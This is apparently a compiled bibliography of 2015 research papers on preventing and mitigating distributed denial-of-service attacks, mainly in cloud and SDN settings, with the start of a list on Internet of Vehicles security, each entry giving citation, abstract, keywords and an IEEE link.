Abstract: Distributed Denial of Service (DDoS) attacks can affect the availability of the networks. In the age of cloud computing, these attacks are being more harmful in terms of their common influences and their new effects that harm the cloud sustainability by exploiting its scalability and payment model (pay-as-you-use). Therefore, a new form of DDoS attacks is introduced in the cloud context as an economical version of such attack. This new form is known as Economical Denial of Sustainability (EDoS) attack. To counteract such attacks, traditional network security means are used. Specifically, the firewalls that are working as filters for the incoming packets to the targeted network according to designated rules by the administrators can mitigate the impacts of DDoS and EDoS attacks. In this paper, a new solution called Enhanced DDoS-Mitigation System (Enhanced DDoS-MS) is proposed to encounter these attacks by utilizing the firewall capabilities in controlling a verification process to protect the targeted system. These capabilities are evaluated in a simulation environment. The results proved that the firewall mitigates the DDoS impacts successfully by improving the provided services to the users in terms of the response time and server load under attack. The study also suggests following implementation for the proposed framework with an active testbed.

Keywords: Cloud computing; Computer crime; Floods; IP networks; Protocols; Servers; DDoS; Distributed Denial of Service attacks; EDoS; Economical Denial of Sustainability; cloud computing (ID#: 16-9080)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373219&isnumber=7373199

 

Jinyong Kim; Daghmehchi Firoozjaei, M.; Jeong, J.P.; Hyoungshick Kim; Jung-Soo Park, "SDN-Based Security Services Using Interface To Network Security Functions," in Information and Communication Technology Convergence (ICTC), 2015 International Conference on, pp. 526-529, 28-30 Oct. 2015. doi: 10.1109/ICTC.2015.7354602

Abstract: This paper proposes a framework for security services using Software-Defined Networking (SDN) and Interface to Network Security Functions (I2NSF). It specifies requirements for such a framework for security services based on network virtualization. It describes two representative security systems, such as (i) centralized firewall system and (ii) DDoS-attack mitigation system. For each service, this paper discusses the limitations of existing systems and presents a possible SDN-based system to protect network resources by controlling suspicious and dangerous network traffic.

Keywords: firewalls; software defined networking; telecommunication security; (I2NSF; DDoS-attack mitigation system; SDN-based security services; SDN-based system; centralized firewall system; interface-to-network security functions; network resources; network security functions; network traffic; software-defined networking; Access control; Communication networks; Computer crime; Control systems; Firewalls (computing); Servers (ID#: 16-9081)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7354602&isnumber=7354472

 

Tang, C.; Lee, E.; Tang, A.; Lixin Tao, "Mitigating HTTP Flooding Attacks with Meta-data Analysis," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1406-1411, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.203

Abstract: The rise of Distributed Denial of Service (DDoS) attacks has posed a dire threat to cloud computing services in recent years. First, it is getting increasingly difficult to discriminate legitimate traffic from malicious traffic since both are legal at the application-protocol level. Second, DDoS attacks have tremendous impacts on virtual machine performance due to the over-subscribed sharing nature of a cloud data center. To prevent the most serious HTTP GET flooding attacks, we propose a meta-data based monitoring approach, in which the behavior of malicious HTTP requests is captured through real-time and big-data analysis. The proposed DDoS defense system can provide continued service to legitimate clients even when the attacking line-rate is as high as 9Gbps. An intelligent probe is first used to extract the meta-data about an HTTP connection, which can be thought of as (IP, URL) (Uniform Resource Locators). Then, a real-time big-data analyzing technique is applied on top of the meta-data to identify the IP addresses whose HTTP request frequency significantly surpasses the norm. The blacklist, consisting of these IP addresses, is further aggregated, enabling inline devices (firewalls and load balancers) to apply rate-limiting rules to mitigate the attacks. Our findings show that the performance of the meta-data based detection system is one order of magnitude better than the previous approach.

Keywords: Big Data; cloud computing; computer centres; data analysis; firewalls; meta data; telecommunication traffic; transport protocols; virtual machines; Big-Data analysis; DDoS attack; DDoS defense system; HTTP GET flooding attack mitigation; HTTP connection; HTTP request frequency; IP address; application-protocol level; cloud computing services; cloud data center; distributed denial of service attack; firewall; inline devices; intelligent probe; legitimate traffic; load balancer; malicious HTTP request; malicious traffic; meta-data analysis; meta-data based detection system; meta-data based monitoring approach; rate-limiting rule; virtual machine performance; Computer crime; Floods; IP networks; Protocols; Real-time systems; Servers; Uniform resource locators; DDoS; HTTP GET flooding; meta-data analysis; network protocol parser (ID#: 16-9082)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336365&isnumber=7336120

 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Distributed Denial of Service Attack Prevention 2015

 

 
SoS Logo

Distributed Denial of Service Attack Prevention 2015

 

Distributed Denial of Service Attacks continue to be among the most prolific forms of attack against information systems.  According to the NSFOCUS DDOS Report for 2014 (available at: http://en.nsfocus.com/2014/SecurityReport_0320/165.html), DDOS attacks occur at the rate of 28 per hour.  Research into methods of prevention is also substantial, as the articles presented here show.  This work was presented in 2015.


Akbar, Abdullah; Basha, S.Mahaboob; Sattar, Syed Abdul, "Leveraging the SIP Load Balancer to Detect and Mitigate DDoS Attacks," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1204-1208, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380646

Abstract: SIP-based Voice Over IP(VoIP) network is becoming predominant in current and future communications. Distributed Denial of service attacks pose a serious threat to VOIP network security. SIP servers are victims of DDos attacks. The major aim of the DDos attacks is to avoid legitimate users to access resources of SIP servers. Distributed Denial of service attacks target the VOIP network by deploying bots at different locations by injecting malformed packets and even they halt the entire VOIP service causes degradation of QoS(Quality of Service). DDos attacks are easy to launch and quickly drain computational resources of VOIP network and nodes. Detecting DDos attacks is a challenging and extremely difficult due to its varying strategy and scope of attackers. Many DDos detection and prevention schemes are deployed in VOIP networks but they are not complete working in both realtime and offline modes. They are inefficient in detecting dynamic and low-rate DDos attacks and even fail when the attack is launched by simultaneously manipulating multiple SIP attributes. In this paper we propose a novel scheme based on Hellinger distance(HD) to detect low-rate and multi-attribute DDos attacks. Usually DDos detection and mitigations schemes are implemented in SIP proxy. But we leverage the SIP load balancer to fight against DDos by using existing load balancing features. We have implemented the proposed scheme by modifying leading open source kamailio SIP proxy server. We have evaluated our scheme by experimental test setup and found results are outperforming the existing DDos prevention schemes in terms of detection rate, system overhead and false-positive alarms.

Keywords: Computer crime; Feature extraction; Floods; Internet telephony; Multimedia communication; Protocols; Servers; Overload Control; Session Initiation Protocol (SIP); kamailio; server (ID#: 16-9050)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380646&isnumber=7380415

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., "Web Server Protection against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication," in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, pp. 261-267, 1-5 July 2015. doi: 10.1109/COMPSAC.2015.240

Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks that have significant impact on destination servers and networks due to their ability to be launched with minimal computational resources to cause an effect of high magnitude. Commercial and government Web servers have become the primary target of these kinds of attacks, with the recent mitigation efforts struggling to deaden the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal and legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous as they may cause IDS/IPS to block the user's benign traffic. Our focus and contributions in this paper are first, to mitigate the undetected malicious traffic mimicking legitimate traffic and developing a special anti-DDoS module for general and specific DDoS tools attacks by using a trained classifier in a random tree machine-learning algorithm. We use labeled datasets to generate rules to incorporate and fine-tune existing IDS/IPS such as Snort. Secondly, we further assist IDS/IPS by processing traffic that is classified as malicious by the IDS/IPS in order to identify FPs and route them to their intended destinations. To achieve this, our approach uses active authentication of traffic source of both legitimate and malicious traffic at the Bait and Decoy server respectively before destined to the Web server.

Keywords: Internet; computer network security; file servers; learning (artificial intelligence); pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers; intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9051)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299

 

Van Trung, Phan; Huong, Truong Thu; Van Tuyen, Dang; Duc, Duong Minh; Thanh, Nguyen Huu; Marshall, Alan, "A Multi-Criteria-Based DDoS-Attack Prevention Solution Using Software Defined Networking," in Advanced Technologies for Communications (ATC), 2015 International Conference on, pp. 308-313, 14-16 Oct. 2015. doi: 10.1109/ATC.2015.7388340

Abstract: Software-Defined Networking (SDN) has become a promising network architecture in which network devices are controlled by a SDN Controller. Employing SDN offers an attractive solution for network security. However the attack prediction and Prevention, especially for Distributed Denial of Service (DDoS) attacks is a challenge in SDN environments. This paper, analyzes the characteristics of traffic flows up-streaming to a Vietnamese ISP server, during both states of normal and DDoS attack traffic. Based on the traffic analysis, an SDN-based Attack Prevention Architecture is proposed that is able to capture and analyze incoming flows on-the-fly. A multi-criteria based Prevention mechanism is then designed using both hard-decision thresholds and Fuzzy Inference System to detect DDoS attack. In response to determining the presence of attacks, the designed system is capable of dropping attacks flows, demanding from the control plane.

Keywords: Computer architecture; Computer crime; Fuzzy logic; IP networks; Servers; Switches; DDoS attack; Fuzzy Logic; OpenFlow/SDN (ID#: 16-9052)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7388340&isnumber=7388293

 

Osanaiye, O.A., "Short Paper: IP Spoofing Detection for Preventing DDoS Attack in Cloud Computing," in Intelligence in Next Generation Networks (ICIN), 2015 18th International Conference on, pp. 139-141, 17-19 Feb. 2015. doi: 10.1109/ICIN.2015.7073820

Abstract: Distributed Denial of Service (DDoS) attack has been identified as the biggest security threat to service availability in Cloud Computing. It prevents legitimate Cloud Users from accessing pool of resources provided by Cloud Providers by flooding and consuming network bandwidth to exhaust servers and computing resources. A major attribute of a DDoS attack is spoofing of IP address that hides the identity of the attacker. This paper discusses different methods for detecting spoofed IP packet in Cloud Computing and proposes Host-Based Operating System (OS) fingerprinting that uses both passive and active method to match the Operating System of incoming packet from its database. Additionally, how the proposed technique can be implemented was demonstrated in Cloud Computing environment.

Keywords: IP networks; cloud computing; computer network security; operating systems (computers);resource allocation; DDoS attack prevention; IP spoofing detection; active method; cloud computing; cloud providers; cloud users; computing resources; distributed denial of service attack; host-based OS fingerprinting; host-based operating system fingerprinting; network bandwidth flooding; passive method; security threat; service availability; spoofed IP packet detection; Cloud computing; Computer crime; Databases; Fingerprint recognition; IP networks; Probes; Cloud Computing; DDoS attack; IP Spoofing; OS Fingerprinting (ID#: 16-9053)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073820&isnumber=7073795

 

Mizukoshi, M.; Munetomo, M., "Distributed Denial of Services Attack Protection System With Genetic Algorithms on Hadoop Cluster Computing Framework," in Evolutionary Computation (CEC), 2015 IEEE Congress on, pp. 1575-1580, 25-28 May 2015. doi: 10.1109/CEC.2015.7257075

Abstract: DDoS attacks become serious as one of the menaces of the Internet security. It is difficult to prevent because DDoS attacker send spoofing packets to victim which makes the identification of the origin of attacks very difficult. A series of techniques have been studied such as pattern matching by learning the attack pattern and abnormal traffic detection. However, pattern matching approach is not reliable because attackers always set attacks of different traffic patterns and pattern matching approach only learns from the past DDoS data. Therefore, a reliable system has to watch what kind of attacks are carried out now and investigate how to prevent those attacks. Moreover, the amount of traffic flowing through the Internet increase rapidly and thus packet analysis should be done within considerable amount of time. This paper proposes a scalable, real-time traffic pattern analysis based on genetic algorithm to detect and prevent DDoS attacks on Hadoop distributed processing infrastructure. Experimental results demonstrate the effectiveness of our scalable DDoS protection system.

Keywords: computer network security; data handling; genetic algorithms; parallel processing; telecommunication traffic; DDoS attack prevention; Hadoop cluster computing framework; Hadoop distributed processing infrastructure; Internet security; distributed denial-of-service attack protection system; genetic algorithms; scalable DDoS protection system; spoofing packets; traffic pattern analysis; Accuracy; Computer crime; Distributed processing; Genetic algorithms; Genetics; IP networks; Sparks; DDoS attack; Genetic Algorithm; Hadoop (ID#: 16-9054)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7257075&isnumber=7256859

 

Nagpal, B.; Sharma, P.; Chauhan, N.; Panesar, A., "DDoS Tools: Classification, Analysis and Comparison," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 342-346, 11-13 March 2015.  Doi:  (not provided)

Abstract: Distributed Denial of Service (DDoS) attacks are the major concern for the security experts. DDoS attack presents a serious risk to the internet. In this type of attack a huge number of accommodated targets send a request at the victim's site simultaneously, to exhaust the resources (whether computing or communication resources) within very less time. In the last few years, it is recognised that DDoS attack tools and techniques are emerging as effective, refined, and complex to indicate the actual attackers. Due to the seriousness of the problem many detection and prevention methods have been recommended to deal with these types of attacks. This paper aims to provide a better understanding of the existing tools, methods and attack mechanism. In this paper, we commenced a detailed study of various DDoS tools. This paper can be useful for researchers and readers to provide the better understanding of DDoS tools in present times.

Keywords: computer network security; DDoS attack tools; classification; distributed denial of service attacks; Bandwidth; Computer architecture; Computer crime; Encryption; Floods; IP networks; Internet; DDoS; DDoS attack methods; DDoS attack tools; DDoS defences (ID#: 16-9055)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100270&isnumber=7100186

 

Ali, W.; Jun Sang; Naeem, H.; Naeem, R.; Raza, A., "Wireshark Window Authentication Based Packet Capturing Scheme to Prevent DDoS Related Security Issues in Cloud Network Nodes," in Software Engineering and Service Science (ICSESS), 2015 6th IEEE International Conference on, pp. 114-118, 23-25 Sept. 2015. doi: 10.1109/ICSESS.2015.7339017

Abstract: DoS (Denial of Service) attack forces a cloud network node to handle few unauthorized access that employ unwanted computing cycle. As a result, the cloud node response is slow as usual and resource on cloud network becomes unavailable. Some Dos attacks are Ping of Death, Teardrop, Snork, Locking authentication, SYN flooding, Operating System Attacks etc. The most vulnerable incident happen when the adversary is committed DDoS (Distributed Denial of Service) attack with comprised cloud network. In this paper, the prevention techniques for DDoS (Distributed Denial of Service) attack in cloud nodes were discussed, a dynamic window scheme in cloud nodes to determine a message verification to resolve unnecessary packet processing was proposed.

Keywords: authorisation; cloud computing; computer network security; DDoS related security issues; Ping of Death; SYN flooding; Snork; Teardrop; Wireshark window authentication based packet capturing scheme; cloud network node response; distributed denial of service attack; dynamic window scheme; locking authentication; operating system attacks; unauthorized access; Computer crime; Computer science; Computers; Service computing; Software; Software engineering; Cloud Nodes; DDoS attack; DoS attack; cloud network; dynamic windows (ID#: 16-9056)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7339017&isnumber=7338993

 

Krylov, V.; Kravtsov, K., "The Convoluted Multiaddress Networking Architecture Principles and Application," in Future Generation Communication Technology (FGCT), 2015 Fourth International Conference on, pp. 1-6, 29-31 July 2015. doi: 10.1109/FGCT.2015.7300237

Abstract: To increase robustness of network nodes and their communication sessions, we propose convoluted multiaddress networking architecture. This approach prevents malicious packets from getting into the incoming traffic of a network terminal. Usually, traffic analyzers and filtering solutions should be installed in the network to isolate a victim node from packet streams created by malefactor terminals. Our network security technique is built on a different approach. The principles of convoluted multiaddress networks are based on the idea that we can protect nodes by hiding their network location from illegitimate clients. In our study, we show how to create dynamic addressing policies for preventing DDoS attacks and traffic eavesdropping. These policies randomize address space and communication data streams, therefore a malefactor cannot acquire access to data streams or destination terminals. In this paper, we discuss IP Fast Hopping, an application of convoluted multiaddress networking in TCP/IP networks. We consider basic implementation of this architecture, its major practical constraints and initial experimental results. The presented approach aims to ensure security of future generation communication technologies. In this study, we suggest Thing Lakes architecture of the Internet of Things, which is based on IP Fast Hopping approach and intended to protect the IoT environment against several major security issues in such networks.

Keywords: IP networks; Internet of Things; telecommunication security; transport protocols; DDoS attacks prevention; IP fast hopping; Internet of Things; IoT environment; TCP-IP networks; convoluted multiaddress networking architecture principles; malefactor terminals; network security technique; network terminal; packet streams; Computer crime; IP networks; Internet of things; Lakes; Logic gates; Servers; DDoS; IP Fast Hopping; Internet of Thing; network security; networking architecture (ID#: 16-9057)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7300237&isnumber=7300234

 

Kumara M A, A.; Jaidhar, C.D., "Hypervisor and Virtual Machine Dependent Intrusion Detection and Prevention System for Virtualized Cloud Environment," in Telematics and Future Generation Networks (TAFGEN), 2015 1st International Conference on, pp. 28-33, 26-28 May 2015. doi: 10.1109/TAFGEN.2015.7289570

Abstract: Cloud Computing enabled by virtualization technology exhibits revolutionary change in IT Infrastructure. Hypervisor is a pillar of virtualization and it allows sharing of resources to virtual machines. Vulnerabilities present in virtual machine leveraged by an attacker to launch the advanced persistent attacks such as stealthy rootkit, Trojan, Denial of Service (DoS) and Distributed Denial of Service (DDoS) attack etc. Virtual Machines are prime target for malignant cloud user or an attacker to launch attacks as they are easily available for rent from Cloud Service Provider (CSP). Attacks on virtual machine can disrupt the normal operation of cloud infrastructure. In order to secure the virtual environment, defence mechanism is highly imperative at each virtual machine to identify the attacks occurring at virtual machine in timely manner. This work proposes In-and-Out-of-the-Box Virtual Machine and Hypervisor based Intrusion Detection and Prevention System for virtualized environment to ensure robust state of the virtual machine by detecting followed by eradicating rootkits as well as other attacks. We conducted experiments using popular open source Host based Intrusion Detection System (HIDS) called Open Source SECurity Event Correlator (OSSEC). Both Linux and windows based rootkits, DoS attack, Files integrity verification test are conducted and they are successfully detected by OSSEC.

Keywords: Linux; cloud computing; computer network security; formal verification; virtual machines; CSP; DDoS attack; HIDS;IT Infrastructure; Linux; OSSEC; Windows based rootkits; cloud computing; cloud infrastructure; cloud service provider; defence mechanism; distributed denial of service attack; files integrity verification test; hypervisor; intrusion prevention system; open source host based intrusion detection system; open source security event correlator; persistent attacks; resource sharing; stealthy rootkit; trojan; virtual machines; virtualization technology; virtualized cloud environment; Computer crime; Databases; Intrusion detection; Kernel; Virtual machine monitors; Virtual machining; Cloud Computing; DoS Attack; Hypervisor; Intrusion Detection and Prevention System; Rootkit; Virtual Machine; Virtualization (ID#: 16-9058)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289570&isnumber=7289553

 

Khadka, B.; Withana, C.; Alsadoon, A.; Elchouemi, A., "Distributed Denial of Service Attack on Cloud: Detection and Prevention," in Computing and Communication (IEMCON), 2015 International Conference and Workshop on, pp. 1-6, 15-17 Oct. 2015. doi: 10.1109/IEMCON.2015.7344496

Abstract: Cloud computing is a distributive and scalable computing architecture. It provides sharing of data and other resources which are accessible from any part of the world for a very low cost. However, Security is one major concern for such computing environment. Distributed Denial of Service (DDoS) is an attack that consumes all the cloud resources may have making it unavailable to other general users. This paper identifies characteristics of DDoS attack and provides an Intrusion Detection System (IDS) tool based on Snort to detect DDoS. The proposed tool will alert the network administrator regarding any attack for any possible resources and the nature of the attack. Also, it suspends the attacker for some time to allow the network admin to implement a fall back plan. As Snort is an open source system, modifying different parameters of the system showed a significant aid in not only detection of DDoS, but also reduction the time for the down time of the network. The proposed tool helps minimize the effect of DDoS by detecting the attack at very early stage and by altering with various parameters which facilitates easy diagnose of the problem.

Keywords: cloud computing; computer network security; public domain software; resource allocation; DDoS attack characteristics; IDS tool; cloud computing; cloud resources; distributed denial of service attack; distributive computing architecture; intrusion detection system tool; network admin; network administrator; open source system; scalable computing architecture; Cloud computing; Computer crime; Cryptography; Firewalls (computing); IP networks; Servers; DDoS; cloud computing; open-source; security; snort (ID#: 16-9059)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7344496&isnumber=7344420

 

Singh, S.; Khan, R.A.; Agrawal, A., "Prevention Mechanism for Infrastructure Based Denial-of-Service Attack Over Software Defined Network," in Computing, Communication & Automation (ICCCA), 2015 International Conference on, pp. 348-353, 15-16 May 2015. doi: 10.1109/CCAA.2015.7148442

Abstract: In software Defined Networking a Denial-of-Service (DoS) or Distributed Denial-of-Service (DDoS) attack is an attempt to make a machine or network resources unavailable for its intended users. Hence the need for protection of such network controller against attacks from within or outside a network is very much important. Although network devices in open flow can also be targeted by attackers and so required a prevention mechanism in order to avoid problems in smooth packet forwarding. In this research task we compose an Infrastructure based DoS attacking scenario over the software defined network and address the vulnerabilities in flow table, and afterward we developed a prevention mechanism to avoid such kind of attack in its initial stage before harming our network. The scenarios for the Infrastructure based DoS attack are developed using Mininet 2.2.0 and platform used for the simulation is Linux Ubuntu-14.10 Utopic Unicorn.

Keywords: computer network security; software defined networking; DDoS attack; Linux Ubuntu-14.10 Utopic Unicorn; Mininet 2.2.0;distributed denial-of-service attack; flow table vulnerabilities ;infrastructure based DoS attacking scenario; network controller protection; network devices; open flow; prevention mechanism; smooth packet forwarding; software defined networking; Bandwidth; Computer crime; Floods; IP networks; Servers; Software defined networking; Denial of Service attack; Mininet; Open Flow; Software Defined Network (ID#: 16-9060)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7148442&isnumber=7148334

 

Alosaimi, Wael; Alshamrani, Mazin; Al-Begain, Khalid, "Simulation-Based Study of Distributed Denial of Service Attacks Prevention in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 60-65, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.50

Abstract: Distributed Denial of Service (DDoS) attacks can affect the availability of the networks. In the age of cloud computing, these attacks are being more harmful in terms of their common influences and their new effects that harm the cloud sustainability by exploiting its scalability and payment model (pay-as-you-use). Therefore, a new form of DDoS attacks is introduced in the cloud context as an economical version of such attack. This new form is known as Economical Denial of Sustainability (EDoS) attack. To counteract such attacks, traditional network security means are used. Specifically, the firewalls that are working as filters for the incoming packets to the targeted network according to designated rules by the administrators can mitigate the impacts of DDoS and EDoS attacks. In this paper, a new solution called Enhanced DDoS-Mitigation System (Enhanced DDoS-MS) is proposed to encounter these attacks by utilizing the firewall capabilities in controlling a verification process to protect the targeted system. These capabilities are evaluated in a simulation environment. The results proved that the firewall mitigates the DDoS impacts successfully by improving the provided services to the users in terms of the response time and server load under attack. The study also suggests following implementation for the proposed framework with an active testbed.

Keywords: Cloud computing; Computer crime; Floods; IP networks; Protocols; Servers; DDoS; Distributed Denial of Service attacks; EDoS; Economical Denial of Sustainability; cloud computing (ID#: 16-9061)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373219&isnumber=7373199

 

Hillmann, Peter; Tietze, Frank; Rodosek, Gabi Dreo, "Tracemax: A Novel Single Packet IP Traceback Strategy for Data-Flow Analysis," in Local Computer Networks (LCN), 2015 IEEE 40th Conference on, pp. 177-180, 26-29 Oct. 2015. doi: 10.1109/LCN.2015.7366300

Abstract: The identification of the exact path that packets are routed on in the network is quite a challenge. This paper presents a novel, efficient traceback strategy named Tracemax in context of a defense system against distributed denial of service (DDoS) attacks. A single packet can be directly traced over many more hops than the current existing techniques allow. In combination with a defense system it differentiates between multiple connections. It aims to letting non-malicious connections pass while bad ones get thwarted. The novel concept allows detailed analyses of the traffic and the transmission path through the network. The strategy can effectively reduce the effect of common bandwidth and resource consumption attacks, foster early warning and prevention as well as higher the availability of the network services for the wanted customers.

Keywords: Bandwidth; Computer crime; IP networks; Labeling; Ports (Computers); Reconstruction algorithms; Routing; Computer network management; Denial of Service; IP networks; IP packet; Packet trace; Traceback (ID#: 16-9062)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366300&isnumber=7366232

 

AbdAllah, E.G.; Zulkernine, M.; Hassanein, H.S., "Detection and Prevention of Malicious Requests in ICN Routing and Caching," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on,  pp. 1741-1748, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.262

Abstract: Information Centric Networking (ICN) is a new communication paradigm for the upcoming Next Generation Internet (NGI). ICN is an open environment that depends on in-network caching and focuses on contents rather than infrastructures or end-points as in current Internet architectures. These ICN attributes make ICN architectures subject to different types of routing and caching attacks. An attacker sends malicious requests that can cause Distributed Denial of Service (DDoS), cache pollution, and privacy violation of ICN architectures. In this paper, we propose a solution that detects and prevents these malicious requests in ICN routing and caching. This solution allows ICN routers to differentiate between legitimate and attack behaviours in the detection phase based on threshold values. In the prevention phase, ICN routers are able to take actions against these attacks. Our experiments show that the proposed solution effectively mitigates routing and caching attacks in ICN.

Keywords: Internet; computer network security; next generation networks; telecommunication network routing; DDoS; ICN architectures; ICN caching; ICN routing; Internet architectures; NGI; attack behaviours; cache pollution; caching attacks; detection phase; distributed denial of service; information centric networking; innetwork caching; malicious requests detection; malicious requests prevention; next generation Internet; privacy violation; routing attacks; Computer architecture; Computer crime; Internet; Pollution; Privacy; Routing; Time factors; ICN routing and caching attacks; Information centric networking (ID#: 16-9063)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363308&isnumber=7362962


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Internet of Vehicles 2015

 

 
SoS Logo

Internet of Vehicles 2015

 

The term “Internet of Vehicles” refers to a system of the Internet of Things related to automobiles and other vehicles.  It may include Vehicular Ad-hoc Networks (VANETs).  For the Science of Security community, it is important relative to cyber physical systems, resilience, human factors and metrics.  The work cited here was presented in 2015.


Huiyong Li; Yuanrui Zhang; Yixiang Chen, "PSTEP - A Novel Probabilistic Event Processing Language for Uncertain Spatio-temporal Event Streams of Internet of Vehicles," in Software Quality, Reliability and Security - Companion (QRS-C), 2015 IEEE International Conference on, pp. 161-168, 3-5 Aug. 2015. doi: 10.1109/QRS-C.2015.43

Abstract: Internet of Vehicles (IoV, shortly) is a typical system of Internet of Things. Spatio-Temporal event stream is one of basic features of IoV. These event streams often are uncertain due to the limit of the monitoring device and the high speed of vehicles. Developing an event processing language to process these spatio-temporal event streams with uncertainty is a challenge issue. The goal of this paper is to develop a Probabilistic Event Processing Language, called as Probabilistic Spatio-Temporal Event Processing language (PSTEP, shortly), dealing with this challenge issue. In PSTEP, we use the Possible World Model to express uncertain spatio-temporal events of IoV and assign a spatio-temporal event with a probability which is the threshold value for processing the existence of an event. We establish its syntax and operational semantics. Finally, a case study is given to show the effectiveness of the PSTEP language.

Keywords: Internet; probability ;uncertain systems; Internet of Vehicles; IoV; PSTEP language; possible world model; probabilistic spatio-temporal event processing language; uncertain spatio-temporal event streams; Data models; Intelligent vehicles; Internet of things; Monitoring; Probabilistic logic; Spatial databases; Syntactics; Event Processing Language; Event-Driven Architecture; Formal Semantics; Internet of Things; Internet of Vehicles; Mobile System; Uncertain Event (ID#: 16-9232)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322138&isnumber=7322103

 

Ben Jaballah, W.; Conti, M.; Mosbah, M.; Palazzi, C.E., "Impact of Security Threats in Vehicular Alert Messaging Systems," in Communication Workshop (ICCW), 2015 IEEE International Conference on, pp. 2627-2632, 8-12 June 2015. doi: 10.1109/ICCW.2015.7247575

Abstract: Automotive industry is about to make a cutting-edge step in terms of vehicular technologies by letting vehicles communicate with each other and create an Internet of Things composed by vehicles, i.e., an Internet of Vehicles (IoV). In this context, information dissemination is very useful in order to support safe critical tasks and to ensure reliability of the vehicular system. However, the industrial community focused more on safe driving and left security as an afterthought, leading to the design of insecure vehicular and transportation systems. In this paper, we address potential security threats for vehicular safety applications. In particular, we focus on a representative vehicular alert messaging system, and we point out two security threats. The first threat concerns relay broadcast message attack that forces the honest nodes to not collaborate in forwarding the message. The second threat focuses on interrupting the message relaying to degrade the network performance. Finally, we run a thorough set of simulations to assess the impact of the proposed attacks to vehicular alert messaging systems.

Keywords: Internet of Things; automobile industry; electronic messaging; security of data; Internet of Things; automotive industry; information dissemination; relay broadcast message attack; security threats; vehicular alert messaging systems; Conferences; Delays; Internet of things; Relays; Safety; Security; Vehicles (ID#: 16-9233)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7247575&isnumber=7247062

 

Chatrapathi, C.; Rajkumar, M.N.; Venkatesakumar, V., "VANET Based Integrated Framework for Smart Accident Management System," in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, pp. 1-7, 25-27 Feb. 2015. doi: 10.1109/ICSNS.2015.7292411

Abstract: Number of vehicles on the road increase dramatically in the recent years. It leads to Accidents that are the major cause of death in most of the countries. Even though there is a vast development of traffic management system and automotive technologies, the number of accidents increases day to day. In most of the cases of accidents, lack of providing quick first aid and timely medical service is the cause for loss of life. Hence it is necessary to develop a common framework for accident detection, avoiding secondary accidents, timely alert of first responder and optimizing the traffic for the first responder (ambulance). In our approach we combine emerging Internet of Things (IoT) and VANET to propose a framework for accident alerting and traffic optimization for ambulances Our approach provides reliable, autonomous framework which allows vehicles, ambulances, and hospitals to establish and maintain their network themselves. Our approach reduces the amount of time lacks in alerting ambulance and due to traffic congestion and increases the chance of saving the lives of the accident victims.

